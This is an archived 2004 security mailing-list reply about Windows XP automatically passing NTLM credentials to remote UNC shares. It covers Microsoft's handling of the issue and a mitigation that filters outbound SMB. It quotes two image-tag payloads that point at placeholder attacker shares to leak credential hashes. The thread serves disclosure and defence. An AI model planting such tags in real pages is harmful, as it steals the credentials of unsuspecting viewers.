[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <2310581523.20040929105242@SECURITY.NNOV.RU>
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Subject: Automatically passing NTLM authentication credentials on Windows XP
Dear Hidenobu Seki,
HS> Tell me why Microsoft issued patches for MS00-067(KB272743) and
HS> MS01-001(KB282132) but not for "img src". > 3APA3A or all
I have same question. I had discussion on this topic with Microsoft
security team again just few weeks ago (and 2 more discussions during
last 4 years). They accepted this problem and have re-opened the case
(MSRC 5468lw) but gave no timelines for solution. I think MS doesn't
understand problem completely. For example, they still believe SMB
signing prevents NTLM relaying attacks while SMB signing doesn't prevent
even simplest port redirection, because IP address is not signed.
Currently there is no way to mitigate this problem except filtering
outgoing NetBIOS and CIFS requests by implementing domain wide IP
Security policy to allow SMB and CIFS communication only with file
servers/domain controllers (if somebody is interested I can publish
step-by-step instructions, but I believe MS should publish KB article to
describe this configuration).
I don't think problem reported by you is different issue, it's just
another exploit scenario for the same problem. I know few more tricks to
redirect user to UNC share.
--Wednesday, September 29, 2004, 5:43:15 AM, you wrote to 3APA3A@...URITY.NNOV.RU:
>>From: 3APA3A <3APA3A@...URITY.NNOV.RU>
>>
>>This problem is known since at least 1997 and still can be exploited
>>with <IMG SRC="\\w.x.y.z\fakeshare\fakefile"> without any MS Word
>>document.
HS> It is not true.
HS> They are different problems that happen the same phenomenon.
HS> Mr. Cesar Cerrudo taught me that <img
HS> src=file://\\www.xxx.yyy\test> still
HS> works.
HS> Tell me why Microsoft issued patches for MS00-067(KB272743) and
HS> MS01-001(KB282132) but not for "img src". > 3APA3A or all
HS> Kind regards,
HS> Urity
HS> _________________________________________________________________
HS> STOP MORE SPAM with the new MSN 8 and get 2 months FREE*
HS> http://join.msn.com/?page=features/junkmail
--
~/ZARAZA
???????? ????? ??? ???????????? ?????? - ???????.
?? ????? ???????, ?????? ???????????. (???)
Powered by blists - more mailing lists